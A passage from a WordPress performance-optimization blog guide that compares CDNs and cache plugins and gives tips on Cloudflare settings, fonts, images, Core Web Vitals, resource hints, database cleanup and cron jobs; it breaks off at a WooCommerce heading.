Start by looking at their network page (you’ll see BunnyCDN’s network has more PoPs and faster a Tbps than StackPath). Also look at the features (for example, RocketCDN only serves files from the CDN and nothing else while other CDNs do a lot more than just “serving files.” Cloudflare’s dashboard has hundreds of optimizations to improve speed, security, and CPU usage. Aside from choosing a good CDN, make sure to also take advantage of everything it offers. Or just use a service like FlyingProxy/Rocket.net that integrates Cloudflare Enterprise.

CDNPoPsPriceRating
Cloudflare270Freemium2.1
BunnyCDN93$.01 – $.06/GB4.8
QUIC.cloud70Free or $.02 – $.08/GB3.0
Google Cloud CDN100+Varies where purchasedN/A
CloudFront310Free 50GB/yr then $0.02 – $.16/GB4.4
KeyCDN40$.01 – $.11/GB4.5
StackPath (Used By RocketCDN)50Varies where purchased or $7.99/mo2.3
SiteGround CDN14Free on SiteGroundN/A
WPX XDN25Free on WPXN/A

Cloudflare – it’s hard to beat Cloudflare with 270+ data centers and all the robust features. Open your Cloudflare dashboard and use the recommendations below to configure settings.

Free Cloudflare Features I Recommend Using

  • CDN – in your DNS settings, find your domain and change the proxy status to Proxied (orange cloud). This is needed for several Cloudflare features to work.
  • TLS version – set minimum TLS version to 1.2 and make sure TLS 1.3 is enabled.
  • Firewall rules – often used to block access to wp-login, XML-RPC, and “hacky” countries. Firewalls block attacks along with unwanted requests to the server.
  • Bot protection – block spammy bots from hitting your server. I would also check your Wordfence live traffic report to see bots hitting your website in real time and manually block bots like AhrefsBot + SemrushBot if you don’t use them. Bot fight mode can add a JS file to your site (invisible.js) and cause PSI errors (so test this).
  • Brotli – this only works if your host supports Brotli, otherwise GZIP will be used.
  • Early hints – while the server is waiting for a response, preload/preconnect hints are sent to the browser so resources load sooner, reducing your server think time.
  • Browser cache TTL – 1 year is good for static sites (my blog is mostly static so this is what I use) or use 1 month for dynamic sites. This is recommended by Google and can fix serve static assets with an efficient cache policy in PageSpeed Insights.
  • Crawler hints – helps search engines efficiently time crawling and save resources.
  • Cache reserve – improves cache hit ratio by making sure specific content is being served from Cloudflare even when the content hasn’t been requested for months.
  • Workers – deploy code on Cloudflare’s edge servers (try the playground). Workers are serverless with automatic scaling + load balancing. Obviously involves coding knowledge and can reduce LCP by 80%. It can also be used for external cron jobs.
  • Cache everything page rule – most common page rule which caches HTML and improves TTFB, but I recommend APO or Super Page Cache for Cloudflare instead.
  • HTTP/3 – not true HTTP/3 but still a nice feature (test your site using HTTP/3 test).
  • 0-RTT connection resumption – good for repeat visitors, latency, mobile speed.
  • Hotlink protection – saves bandwidth by stopping people from copying your images and using them on their own website while they’re hosted on your server.
  • Zaraz – offload third-party scripts to Cloudflare like Google Analytics, Facebook Pixel, chatbots, and custom HTML. But test your results against delaying these.
  • Monitor bandwidth/analytics – the more bandwidth you offload to Cloudflare the better. This should lighten the load on your server while reducing CPU usage.

Paid Cloudflare Features

  • APO – caches HTML which can improve TTFB in multiple global locations.
  • WAF – block unwanted requests, improve security, and reduce CPU usage.
  • Argo + Tiered Cache – route traffic using efficient paths with Tiered Cache.
  • Image optimizations – I prefer these over plugins. Between all 3 (image resizing, Mirage, Polish), you don’t have to use a bloated image optimization plugin and they usually do a better job. You have features like compression/WebP and they also have mobile optimizations like serving smaller images to reduce mobile LCP.
  • Signed Exchanges – improves LCP when people click links in Google’s search results via prefetching which Google says can lead to a substantial improvement.
  • Load Balancing – creates a failover so your traffic is re-routed from unhealthy origins to healthy origins. Can reduce things like latency, TLS, and general errors.
  • Cloudflare Enterprise – majors benefits include prioritized routing, more PoPs, Argo + Tiered Cache, full page caching, image optimization, and other features depending where you get it from. The easiest/cheapest way is to use a host with Cloudflare Enterprise or FlyingProxy (I recommend Rocket.net’s who even built their data centers in the same locations as Cloudflare). It’s just more thought out than Cloudways/Kinsta. You could also consider using Cloudflare Pro which has some of these features. It requires more configuration but gives you more control.
Opcache memcached redis
Take advantage of different caching layers your host offers

BunnyCDN – Gijo suggests Cloudflare + BunnyCDN which is what I’ve used for a long time. If you’re using FlyingPress, FlyingCDN is powered by BunnyCDN with Bunny Optimizer + geo-replication. It’s also cheaper than buying these directly through BunnyCDN and easy to setup.

Cloudflare with bunnycdn

QUIC.cloud – use this if you’re on LiteSpeed. You’ll want to use the standard (paid) plan since the free plan only uses 6 PoPs and doesn’t have DDoS protection. It has HTML caching which is similar to Cloudflare’s full page caching and is also needed for LSC’s image/page optimizations.

Quic. Cloud cdn free vs. Standard plan

RocketCDN – uses StackPath which was removed from cdnsperf.com and has less PoPs, slower Tbps, no image optimization, no HTML caching, and no other features besides serving files from a CDN. Also isn’t “unlimited” like WP Rocket advertises since they will cut you off at some point.

SiteGround CDN – not a lot of PoPs/features and you have to use their DNS to use it (which if you remember, was blocked by Google for 4 days). I personally wouldn’t trust this with my site.

6. Cache Plugins

Let’s summarize 5 popular cache plugins in 10 lines or less.

FlyingPress – optimizes for core web vitals and real-world browsing better than the last 3. When a new core web vital update comes out (like fetchpriority resource hints), Gijo is almost always first to add it. Awesome features not found in most cache plugins: preloading critical images lets you set the number of images usually shown above the fold to exclude them from lazy load while preloading them. FlyingPress can also lazy render HTML elements, self-host YouTube placeholders, and it has a lazy-bg helper class for lazy loading background images. FlyingCDN uses BunnyCDN with Bunny Optimizer + geo-replication (great choice). The remove unused CSS feature is faster than WP Rocket’s since it loads used CSS in a separate file (instead of inline) which Perfmatters agrees is faster for visitors. Really, the main thing it doesn’t have is server-level caching. I moved from WP Rocket to FlyingPress and saw a big difference in speed.

SG OptimizerWP RocketFlyingPress
Server-side cachingxx
Delay JavaScriptx
Remove unused CSSxInlineSeparate file
Critical CSSx
Preload critical imagesxxBy number
Exclude above the fold imagesBy classBy URLBy number
Lazy load background imagesxInlineHelper class
Fetchpriority resource hintxx
Lazy render HTML elementsxx
Add missing image dimensionsx
YouTube iframe preview imagex
Self-host YouTube placeholderxx
Host fonts locallyxx
Font-display: swapx
Preload linksx
CDN (beyond Cloudflare)SiteGround CDNStackPathBunnyCDN
CDN PoPs146093
CDN TbpsN/A6580
Dynamic cachingxx
CDN geo-replicationxx
CDN image optimizationx
CDN image resizing for mobilexx
Documented APO compatibilityxx

LiteSpeed Cache – also does a great job optimizing for web vitals and real users, but different than FlyingPress. Mainly because it should only be used on LiteSpeed, it’s free, and it has faster server-side caching. However, the settings can be complicated. While some settings are similar to FlyingPress like loading used CSS in a separate file and lazy loading HTML elements, it has its own unique features such as localizing third-party resources, ESI, guest mode, LQIP, and HTML caching through QUIC. Use LSC if you’re on a LiteSpeed host. Anything else, I’d use FlyingPress.

WP Rocket – removing unused CSS is slower for visitors and RocketCDN isn’t a good CDN. WP Rocket doesn’t self-host fonts (or even recommend it) or video placeholders. Excluding above the fold images from lazy load and preloading them individually is tedious. Still no image optimization or documented APO compatibility. While Gijo releases many new features and updates FlyingPress to address core web vital updates, it seems WP Rocket has fallen behind. Two good things about WP Rocket are automatic delaying of JavaScript and documentation.

SiteGround Optimizer – great for caching, not for web vitals. Lacks way too many features and has a history of compatibility issues the developers blame on third-party plugins/themes if you check support threads. My advice is to only use it for caching, disable everything else, then use FlyingPress or WP Rocket (just make sure page caching is only enabled in 1 plugin and disabled in the other). Of course, SiteGround will glorify their cache plugin even when it’s clearly inferior.

NitroPack – don’t use this! The only reason you get better “scores” is because it moves elements off the main-thread so they can’t be detected in speed testing tools. This leads to great (but false) scores and it doesn’t actually do a good job making your website load faster compared to other plugins. Google “NitroPack blackhat” and you’ll find plenty of articles on it.

7. Other Caching

Cache plugins are just 1 layer.

Check whether your host supports object cache (Redis/memcached), OPcache, and HTTP accelerators like Varnish/FastCGI. Most do but they need to be enabled or set up manually.

You also have CDN caching which is its own layer. All these are meant for different things and you should ideally use most (if not all) them. People get scared they’re using too much caching, but as long as you’re only using 1 type of layer (not both Redis + memcached), it’s a good thing.

  • OPcache – enable in your host (can help reduce CPU usage).
  • Browser cache – enable in your cache plugin (stores files in browsers).
  • HTTP accelerators – enable in your host (probably Varnish or FastCGI).
  • Object cache – Redis generally uses memory more efficiently than memcached and is good for large/eCommerce sites. Once it’s enabled in your host, you’ll connect it your site using a plugin (i.e. LiteSpeed Cache, W3 Total Cache, SG Optimizer, WP Redis). Check your host’s documentation/support on which plugin is best. For example, Rocket.net requires you to install the WP Redis plugin while Cloudways requires you to install the Redis addon.
  • CDN cache – APO is not the same as a cache everything page rule or the Super Page Cache plugin. QUIC also does HTML caching, then there are services that include Cloudflare’s full page cache like Rocket.net’s Cloudflare Enterprise, FlyingProxy, and SiteGround Optimizer. The key thing is that you’re caching HTML somewhere as it can significantly improve TTFB.
Opcache memcached redis
Take advantage of different caching layers your host offers

8. Plugins

Watch out for plugins that:

  • Add CSS/JS to the frontend – use the Chrome Dev Tools coverage report to see which plugins add CSS and JS. This includes plugins that inject third-party JavaScript or fonts.
  • Increase CPU usage – common with plugins that collect “statistics” like Wordfence’s live traffic report, Query Monitor, and Broken Link Checker. But can really be from any plugin. WP Hive tells you if a plugin increases memory usage when browsing the WP plugin repo.
  • Add database bloat – use WP-Optimize to see which plugins (or specific plugin modules) add the most database overhead. This is explained more in this guide’s database section.
  • Load above the fold – slow plugins are bad enough, but loading them above the fold is even worse. When plugins load below the fold, you can delay them (i.e. comment plugins).
  • Use jQuery – Perfmatters has a script manager setting to show dependencies. Once it’s enabled, head to the script manager → jQuery and it shows you all plugins using jQuery. Felix Arntz wrote an article on how removing jQuery can reduce JavaScript by up to 80%.
Jquery plugin dependencies 1
Perfmatters shows plugins that depend on jQuery

Lightweight Alternatives

  • Social Sharing – Grow Social.
  • Tables – Gutenberg block (no plugin).
  • Gallery – Gutenberg block (no plugin).
  • Buttons – Gutenberg block (no plugin).
  • Comments – native comments (no plugin).
  • Image Optimization – image CDN (no plugin).
  • Translate – MultilingualPress, Polylang (not WPML).
  • Security – no security plugin (Cloudflare, firewall, etc).
  • Sliders – Soliloquy or MetaSlider (but ideally no sliders).
  • Analytics – call me crazy but I only use Google Search Console.
  • SEO – Rank Math or SEOPress (but most SEO plugins use jQuery).
  • CSS – need custom styling or even a table of contents? Just use CSS.
  • Backups – hosting backups or a lightweight alternative like UpdraftPlus.

In Query Monitor, the “queries by component” section shows your slow plugins. You can also use my list of 75+ common slow plugins. Finally, delete all plugins you’re not using (as well as their database tables in WP-Optimize), and disable plugin features/modules you’re not using.

PluginCategoryMemory ImpactPageSpeed Impact
All In One SEOSEOxx
Broken Link CheckerSEOx
DisqusCommentsx
Divi BuilderPage Builderxx
ElementorPage Builderxx
Elementor Premium AddonsPage Builderx
Elementor ProPage Builderxx
Elementor Ultimate AddonsPage Builderx
JetElementsPage Builderxx
JetpackSecurityxx
NextGEN GalleryGalleryxx
Popup BuilderPopupxx
Site Kit by GoogleAnalyticsx
Slider RevolutionSliderxx
Social Media Share ButtonsSocial Sharingx
WooCommerceWooCommercexx
WordfenceSecurityx
wpDiscuzCommentsxx
WPMLTranslatexx
Yoast SEOSEOx

9. CSS + JavaScript

Probably the #1 reason for poor core web vitals.

New Optimizations

  • Remove unused CSS – WP Rocket’s method of loading used CSS inline is slower for visitors but better for scores. You should ideally use FlyingPress, LiteSpeed Cache, or Perfmatters for this which loads used CSS in a separate file so it can be cached and doesn’t increase HTML size. You should only be using 1 plugin for this. If you’re not using an optimization plugin that does this, try DeBloat or PurifyCSS.
  • Remove Gutenberg CSS – if you don’t use Gutenberg’s block library (i.e. you’re using classic editor), you can remove Gutenberg’s CSS which is loaded by default.
  • Asset unloading plugins – remove CSS/JS (or entire plugins) from specific pages/posts where they don’t need to load. Common examples are only loading contact forms on the contact page, only loading social sharing plugins on posts, and disabling WooCommerce plugins where they’re not used. You can also disable specific files like jQuery and elementor-dialog if you don’t use them. I recommend Perfmatters especially if you’re using WP Rocket or SiteGround Optimizer because it has many optimizations not found in these plugins. Be sure to use test mode and dependencies in your script manager settings. For a free plugin, try Asset CleanUp.
  • Critical CSS – loads above the fold CSS immediately which improves LCP. Most cache plugins do this while others (like SG Optimizer) don’t. If you make changes to stylesheets or custom CSS, regenerate critical CSS so it’s current with your site.
  • Load CSS/JS non render-blocking – both deferring JavaScript and critical CSS help serve resources non render-blocking. Make sure they work in your cache plugin and exclude files from defer if they break your site. Or try Async JavaScript.
  • Minify – Cloudflare lets you do this but you should use your cache plugin instead.
  • Don’t combine – should almost always be off especially on big sites or on HTTP/2.

Optimizations Covered In Other Sections

  • Page builders – Elementor/Divi add extra CSS/JS which can be optimized with their built-in performance settings, coding your header/footer/sidebar in CSS, disabling Elementor fonts/dialog, lazy loading background images in CSS, etc.
  • Plugins – just look at the screenshot below (plugins are obviously a major factor).
  • Third-party code – hosting files locally, delaying JavaScript, and using a smaller GA tracking code can reduce its size or delay so it doesn’t impact initial load times.
  • Font Icons – disable these if you don’t use them or use Elementor’s custom icons.
  • WooCommerce – disable scripts/styles on non-eCommerce content and disable Woo plugins where they don’t need to load (many load across the entire website).
Css javascript chrome dev tools
Use the coverage report to find your largest CSS/JS files

10. Third-Party Code

This is anything on your site that has to pull info from a third-party domain (like Google Fonts, Google Analytics tracking code, or an embedded YouTube video). It’s a common reason for JS-related errors in PSI. Luckily, most of it can be optimized especially if it’s shown below the fold.

  • Step 1: Host files locally – some third-party code can be hosted locally (see the table below). LiteSpeed Cache can localize resources, FlyingPress can host fonts/YouTube thumbnails locally, Perfmatters does fonts and analytics, and WP Rocket does nothing.
Third-Party CodeURL(s)Plugins To Host It Locally
Google Fontsfonts.gstatic.comMost optimization plugins, Elementor, OMGF
Google Analyticsgoogle-analytics.comFlying Analytics, Perfmatters
Gravatarsgravatar.comSimple Local Avatar
YouTube Thumbnailsi.ytimg.comFlyingPress, WP YouTube Lyte
  • Step 2: Delay JavaScript – for third-party code that can’t be hosted locally, delay its JavaScript if it’s loading below the fold (you can also delay plugins loading below the fold). WP Rocket does this automatically while other cache plugins make you add files manually. If your cache plugin doesn’t support this, use Perfmatters or Flying Scripts. In these, you’ll set a timeout period and can increase this if you’re not seeing good results. You can try offloading third-party code to Cloudflare Zaraz, but I prefer delaying its JS.
ga( '
ga('
google-analytics.com/analytics.js
analytics.js
gtagv4.js
analytics-minimal.js
/gtm.js
/gtag/js
gtag(
/gtm-
adsbygoogle.js
grecaptcha.execute
optimize.js
fbevents.js
fbq(
/busting/facebook-tracking/
disqus.com/embed.js
script.hotjar.com
wp-content/themes/script-name
wp-content/plugins/plugin-name
  • Step 3: Prefetch or preconnect everything else – for all third-party code that can’t be hosted locally or delayed, add a DNS prefetch resource hint. Preconnect is usually only used for CDN URLs (not needed for Cloudflare), and third-party fonts (should be hosted locally). Or YouTube if you can’t eliminate requests using video optimizations in step #13.
  • Google Analytics – Perfmatters + Flying Analytics can use a minimal analytics tracking code that’s just 1.5 KB. Perfmatters can also prevent a Doubleclick request by disabling display features, but both these should only be used if you don’t need certain data in GA.
  • Avoid overtracking – one of the most common “mistakes” I see is sites using too many tracking tools: Analytics, Tag Manager, Heatmaps, Pixel, etc. Do you really need them all?
Reduce impact of third party code wordpress

11. Fonts

Probably your largest files after CSS/JS.

Your GTmetrix Waterfall chart shows font load times, number of requests, and whether they’re served locally or from a third-party domain like fonts.gstatic.com or use.fontawesome.com. Be sure to keep tabs on your Waterfall chart as you make optimizations. Fonts can also cause FOIT and FOUT which cause layout shifts. A few simple tweaks can make your fonts load much faster.

  • Reduce font families, weights, icons – try to only use 1 font family and only load the weights you actually use. Disable Font Awesome and Eicons if you don’t use them (Elementor has a tutorial on this). Some fonts also have larger file sizes than others.
  • Use WOFF2 – the most lightweight/universal format which is faster than .ttf and .otf.
  • Host locally – if your fonts are being served from fonts.gstatic.com, host them locally.
  • Preload – fonts should be preloaded when they load above the fold or used in CSS files. Most cache/optimization plugins require you to manually add font files (and if there’s a crossorigin option like in Perfmatters, it should be used for fonts). Elementor hosts fonts locally and preloads them under Theme Customizer → Performance. PSI used to tell you which fonts to preload in “preload key requests” but I don’t think they do this anymore.
  • Add font-display: optional – if you need to “ensure text remains visible during webfont load,” add font-display: optional to your font’s CSS. This is recommended by Google for the fastest performance while preventing layout shifts. It delays loading text up to 100ms. As of writing this, most plugins only support swap found in Elementor, Perfmatters, and most cache plugins. To use optional, you need to add it manually to your font’s CSS, use WP Foft Loader, or use swap until your optimization plugin supports optional. Preloading fonts that use font-display: optional completely eliminates layout shifts (FOIT) from fonts.
  • Load fonts inline – Elementor and Divi have options to do this and so does FlyingPress.
  • System fonts – system fonts generate 0 requests and are obviously best for speed, but even for someone who obsesses over performance, I’d rather have a better looking font.
  • Use custom Icons for Elementor – replace Font Awesome and Eicons with custom icons.
  • Serve Google Fonts from Cloudflare Workers – I’ll leave this here if you want to dive in.

12. Images

There are 7 PSI items related to image optimization, and that doesn’t even cover everything.

Image optimization pagespeed insights
  • Preload critical images and exclude them from lazy load – above the fold content should load immediately which is a big factor of LCP. Instead of delaying images with lazy load, you want the browser to download them immediately by using preload. The easiest way to do this (by far) is “preload critical images” in FlyingPress or Perfmatters. Instead of manually excluding/preloading above the fold images on every single page/post (because they’re usually different), you will set the number of images usually shown above the fold. In my case, it’s 3. This will preload your top 3 images while excluding them from lazy load. Currently, FlyingPress is the only cache plugin I know that supports fetchpriority which is recommended by Google to set things like your LCP image to “high priority.” Props to Gijo.
Above the fold images
Exclude above the fold images from lazy load and preload them
  • LCP image – your most important image to optimize for lower LCP (shown in PSI).
  • Background images – page builders serve background images in their CSS and won’t be lazy loaded, leading to ‘defer offscreen images’ errors. Some cache plugins have a lazy-bg helper class, Perfmatters has a CSS background images setting, and WP Rocket makes you move them to inline HTML. Check the documentation in your cache/image optimization plugin on how to lazy load them. You can also use Optimal or add a helper class yourself.
  • Image CDNs – I use Cloudflare for image optimization but Bunny Optimizer and QUIC are good too. They usually do a better job than plugins (and it’s 1 less plugin on your website).
  • Resize images for mobile – make sure your image optimization plugin (or image CDN) serves smaller images to mobile which should also improve your LCP on mobile. This is the “image resizing” feature in Cloudflare, or you could use ShortPixel Adaptive Images.
  • Properly size images – resize large images to be smaller. My blog is 765px width so I crop/resize blog images to that size (the Zoom Chrome Extension is handy for getting the perfect dimensions when taking screenshots). I always recommend creating an “image dimensions cheat sheet” so you know the size of your blog, featured, sidebar images, etc.
  • WebP – faster than JPEG/PNG and most image optimization plugins or CDNs can do this.
  • Compression – Lighthouse test images at 85% so that’s usually a good compression level.
  • CSS sprites – combines multiple small/decorative images into 1 image so it only creates 1 request. My old homepage used a CSS sprite and it was very fast. You can do it for sections like “featured on” where you show a bunch of logos. You would use a CSS sprite generator.
  • Specify dimensions – most cache plugins can “add missing dimensions” otherwise you would need to add a width/height to the image’s HTML or CSS. This prevents layout shifts.
  • Downgrade quality on slow connections – services like Cloudflare Mirage + Optimole serve low quality images on slow connections until a faster connection can be accessed.
  • Hotlink protection – stops people from using your images when they’re hosted on your server and saves bandwidth. Common with sites using high quality images or if people copy your content. Can be enabled in your host or by using Cloudflare’s hotlink protection.
  • Low quality images placeholders (LQIP) – if you’re using QUIC.cloud on LiteSpeed, these can prevent layout shifts but you need to make sure you’re doing it right or it will look bad.

13. Videos

Unless videos are optimized, they will probably be the slowest thing on a page.

While most cache plugins lazy load videos and replace iframes with a preview image, FlyingPress and WP YouTube Lyte are some of the only plugins that optimize placeholders.

  • Lazy load videos – done in cache plugins, Perfmatters, or try WP YouTube Lyte.
  • Replace YouTube iframes with preview images – the iframe (which is the heaviest element of the video) is only loaded once your visitors actually click the play button.
  • Self-host YouTube placeholders – FlyingPress and WP YouTube Lyte can self-host placeholders to prevent i.ytimg.com requests shown in your “third-party code” report.
  • Preconnect – if you’re not able to make the optimizations above and you still have third-party domains loading from YouTube, you can preconnect domains from youtube.com, i.ytimg.com, and Roboto which is currently being used as the font in the YouTube player.
https://youtube.com/watch?v=FssULNGSZIA%3Fautoplay%3D1

14. Comments

Third-party comment plugins, Gravatars, or just lots of comments can slow down WordPress.

  • Use native comments (not plugins).
  • Cache Gravatars if using LiteSpeed Cache.
  • Delay third-party comments plugins and Gravatars.
  • Use a local avatar plugin to prevent Gravatar requests.
  • If you must use Disqus, use the conditional load plugin.
  • Break comments in your WordPress discussion settings.
  • Try using a “load more comments” button especially on mobile.
  • Lazy load comments/footer (can be done in FlyingPress or LSC).
  • wpDiscuz has options for lazy loading and initiating AJAX loading after page.
Lazy render html elements flyingpress
Some optimization plugins can lazy load any HTML element (including comments)

15. LCP

Largest contentful paint is the core web vital people struggle with most.

View your “longest main-threads tasks” report in PageSpeed Insights and optimize those files. LCP includes 4 sub-parts and Google’s YouTube video is a nice resource for optimizing each one.

Largest contentful paint breakdown google
LCP breakdown
LCP Sub-PartFactorsLCP %
TTFBPrimarily hosting and CDNs + full page caching~40%
Resource load delayExclude above the fold content from optimizations, resource hints<10%
Resource load timeReduce image/CSS/JS sizes, critical CSS, CDN, cache expiration~40%
Element render delayRender-blocking CSS/JS, JS file size, font-display optional<10%

Most LCP recommendations are scattered in this guide, so I’ll just go over them briefly.

  • Exclude above the fold images from lazy load – you should never lazy load, delay, or defer anything that loads above the fold because this content should load immediately, which is why you should also use preload hints to help browsers download them faster.
  • Prioritize above the fold images – preload above the fold images (or use fetchpriority). PSI shows your largest contentful paint image which is the most important to optimize.
  • Reduce CSS, JS, font sizes – a big part of reducing load time is reducing their file sizes.
  • Reduce TTFB – 40% of LCP can usually be improved with a better hosting + CDN setup.
  • Eliminate render-blocking CSS/JS – render-blocking resources add delay (see video).
  • Use font-display: optional – if fonts aren’t loaded properly, they can also add delay.
  • Lazy render HTML elements – allows browsers to focus on the above the fold content.
  • Preload, preconnect, prefetch – hints browsers to download specific resources faster.
  • Increase cache expiration – also mentioned by Google (Cloudflare browser cache TTL).
  • Choose the right cache plugin/settings – some have better optimizations than others.
  • Enable Signed Exchanges (SXGs) – this is found in Cloudflare (Speed → Optimization).
  • Use Cloudflare Workers – Google Engineer used Workers to improve LCP by about 80%.
  • Move plugin content, ads, animations below the fold – that way, they can be delayed.

16. CLS

Layout shifts happen when things jump around while the page is loading.

You can use Google’s layout shift debugger to see these in a GIF. PSI also has an “avoid large layout shifts” item showing you which sections on your website contribute the most to CLS. Even with these recommendations, it’s hard to know why the section is causing a layout shift.

  • Change font-display to swap or optional – do this if you see “ensure text remains visible during webfont load.” As shown in section #11, font-display: optional is the best method.
  • Problems with loading CSS asynchronously – this is a setting in cache plugins that can add layout shifts caused by FOUC (flash of unstyled content). Ideally use the “remove unused CSS” method instead. If this breaks your site and you default back to loading CSS asynchronously, make sure you exclude problematic files causing FOUC, ensure critical CSS is working, and always regenerate critical CSS after updating stylesheets/custom CSS.
  • Preload fonts – preloading fonts eliminates layout shifts when they use display: optional.
  • Specify dimensions of images, videos, iframes, ads – the first 3 are easy (make sure a width and height are specified in images). Ads and other dynamic content should have reserved space by placing it in a div code. The width/height should be the ad’s largest size.
  • Use CSS transform in animations – not a fan of animations but here’s documentation.
  • Use separate mobile cache (when it makes sense) – if your mobile site is different than desktop and you’re not using a separate mobile cache, it can cause layout shifts. However, you’ll need to check your cache plugin’s documentation on when to use (and not use) this.
  • Change cookie notice plugin – search your plugin’s support thread. It’s been reported some cookie plugins cause layout shifts. I recommend Gijo’s solution or this Cookie plugin.
Cumulative layout shift

17. Preload, Prefetch, Preconnect

These help browsers download high priority resources faster.

They prioritize above the fold content (preload + fetchpriority). Preload is also used in Cloudflare’s Early Hints and for downloading internal pages in the background so they load faster when visitors click them (link preloading + Flying Pages). Prefetch + preconnect help establish early connections to third-party domains if resources aren’t already being delayed.

Preload – commonly used for above the fold images (this can also be a WebP image) but can also be used for CSS/JS (i.e. the block library), videos, audio, Cloudflare workers, and other files.

<link rel="preload" href="/image.webp?x55484" as="image">
<link rel="preload" href="/font.woff2" as="font" crossorigin>

Fetchpriority – similar to preload only assigns a priority (low, high, auto). For example, if you have a large LCP image, you would assign that image’s priority to “high.” But if you have an image carousel that’s loading above the fold, you could assign the images with a low priority. FlyingPress is the only plugin I know currently supporting fetchpriority shown in the changelog.

<img src="lcp-image.webp" fetchpriority="high">

Link preloading – there’s 2 main types: preloading links in the viewport so internal links in the immediate content load faster when clicked (supported by Flying Pages and FlyingPress). And “link preloading” where users hover over any internal link (or touch it on mobile), and the page will download in the background so by the time they actually click it, it appears to load instantly (found in cache plugins like WP Rocket). While neither improves scores, both improve perceived load time. Just be careful… preloading too many pages in the background will increase CPU usage especially if you have something like a WooCommerce store with internal links in images. If visitors are hovering over product images, this will cause lots of pages to download. Not good!

Flying pages by wp speed matters

DNS Prefetch – this helps browsers anticipate third-party domains by performing a DNS lookup, but usually not needed since third-party domains should be hosted locally or delayed.

<link rel="dns-prefetch" href="https://connect.facebook.net">
<link rel="dns-prefetch" href="https://www.googletagservices.com">

Preconnect – establishes early connections to important third-party domains. Common with CDN URLs and third-party fonts like fonts.gstatic.com, use.fontawesome.com, and use.typekit. Most cache plugins add preconnect automatically when you add a CDN URL or when enabling “Google Font Optimization” (or a similar setting), but you’ll want to check their documentation.

<link rel="preconnect" href="/assets/vendor/gstatic" crossorigin>
<link rel="preconnect" href="https://cdn.yourdomain.com" crossorigin>
Preload font perfmatters
You can use Perfmatters or Pre* Party if your optimization plugin doesn’t support a specific resource hint

18. Database

There’s usually 3 problems with using your cache plugin to clean your database:

  • It can’t take database backups.
  • It can’t remove database tables left behind by old plugins.
  • It deletes all post revisions, but you may want to keep a few.

That’s why I recommend WP Optimize for database cleanups. Go through your database tables and look for tables that are not installed or inactive. You can delete these if you don’t plan on using the plugin (or theme) again since they will usually store info in the database for future use.

Wp optimize unused database tables

Certain plugin modules/features can also add lots of overhead especially if they collect data. Rank Math’s Google Analytics module adds lots of overhead, so consider disabling this Rank Math module and getting your analytics data directly from the Google Analytics website instead.

Rank math database bloat

For ongoing database cleanup, WP-Optimize removes everything most cache plugins do, but it lets you keep a certain amount of post revisions so you have backups (I recommend 5-10). You can also connect UpdraftPlus which takes a database backup before scheduled optimizations.

Wp optimize schedule database cleanup settings

19. Background Tasks

Background tasks can bog down your server and increase CPU usage.

These are common with cache plugins (preloading + automatic cache clearing), plugins that collect stats or create autoloads, and even WordPress core (Heartbeat, autosaves, pingbacks). Many of these can be disabled, limited, or scheduled during non-peak hours using a cron job.

  • Control Preloading – the preloading in cache plugins is infamous for increasing CPU usage (WP Rocket’s preloading, LSC crawler, SG Optimizer’s preheat cache, etc). The first step is changing settings to only preload important sitemap URLs (i.e. page-sitemap.com + post-sitemap.com) instead of the full sitemap. Next, you can increase the preload interval.
Wp rocket sitemap preloading
Only preload important sitemap URLs (not the full sitemap)
  • Automatic cache clearing – there are specific actions that trigger your entire cache to be cleared (and when the cache lifespan expires). Instead of constantly clearing cache with these actions, disable automatic cache clearing and use a cron job to clear it at a specific time (once at night). It’s best to use a cron job for both cache clearing + cache preloading.
  • Disable WP-Cron – using an external cron to schedule tasks like the 2 items above helps reduce CPU usage. The first step is to add the code below your wp-config.php file. Next, setup a real cron job in your host, Cloudflare, or using a third-party service like EasyCron. Some hosts have specific instructions for adding a cron job, so check their documentation.
define('DISABLE_WP_CRON', true);

Now add a real cron job.

Cron job minutes
wget -q -O - https://yourwebsite.com/wp-cron.php?doing_wp_cron >/dev/null 2>&1
External cron job
Scheduling tasks using cron jobs for 5-10 minutes can reduce CPU usage
  • Remove unused CSS – decrease WP Rocket’s batch size and increase the cron interval.
  • Link preloading – some cache plugins can “preload links” which sounds like a good idea because when users hover over a link, that page downloads in the background to make it load faster by the time users actually click it. But if your website has lots of links (such as a WooCommerce store with links in the product images), you’ll want to leave this setting off.
  • Plugins – think of Query Monitor, Wordfence’s live traffic report, and backup/statistic plugins (they all run background tasks). You might be able schedule these, disable specific features in plugins, or delete the plugin completely. Plugins/themes can also leave behind autoloaded data when you delete them which can be cleaned up in the wp_options table.
  • Autosaves – when you’re editing a post, WordPress autosaves a draft every minute. You can use a simple line of code (or Perfmatters) to increase this to something like 5 minutes.
define('AUTOSAVE_INTERVAL', 300); // seconds
  • Heartbeat – called every 15s and can usually be disabled in the frontend/backend, then limited in the post editor since you probably want to keep features there (like autosaves).
  • Pingbacks – disable pingbacks since you don’t want a notification every time you add an internal link. You may want to leave trackbacks on to help notify blogs you linked to them.
  • Post revisions –  stored every time you hit save, publish, or update and accumulate over time. You can limit revisions in some optimization plugins, manually with code, or use WP-Optimize to run scheduled database cleanups while keeping a certain number of revisions.
define( 'WP_POST_REVISIONS', 10 );
  • Plugin data sharing – disable in plugins to save a little resources, sorry plugin developers!
  • Bots – blocking spam bots and using Cloudflare’s crawler hints saves resources from bots.
  • Comment spam – I use Antispam Bee and blacklist these words in the Discussion settings.
  • Hosting features – WP Johnny has nice tips on disabling unused services in your hosting account like the DNS, email, FTP/SFTP, proxies, or other services if you’re not using them.
  • Bloat removal plugins – using plugins like Unbloater + Disable WooCommerce Bloat help.

20. Mobile

Poor mobile scores in PSI is a common issue. Most desktop optimizations transfer over to mobile so start with “general optimizations” first. Otherwise, here are mobile-specific tips.

  • Resize images for mobile – image CDNs and adaptive image plugins do this.
  • Reduce latency – use a faster DNS, faster TLS versions, and Cloudflare’s 0-RTT.
  • Replace sliders/galleries with static images – use responsive editing to do this.
  • Remove unused CSS/JS – Perfmatters can disable unused CSS/JS by device type.
  • Don’t use AMP – lots of challenges and most WordPress users agree not to use it.
  • Fix mobile layout shifts – Google’s layout shift debugger tests mobile layout shifts.
  • Use mobile caching – enable this in your cache plugin or use one that supports this.
  • Know when to use separate mobile cache – check your cache plugin documentation.
  • Downgrade image quality on slow connections – try Cloudflare Mirage or Optimole.
  • Check your responsiveness – even if you use a responsive theme, check this manually.
  • Add a “load more comments” button on mobile – helps if you have lots of comments.
Flyingpress responsive images
Most image CDNs serve smaller images to mobile (but not RocketCDN)
Perfmatters disable plugins on mobile
Disable specific files/plugins from loading on mobile in Perfmatters

21. WooCommerce

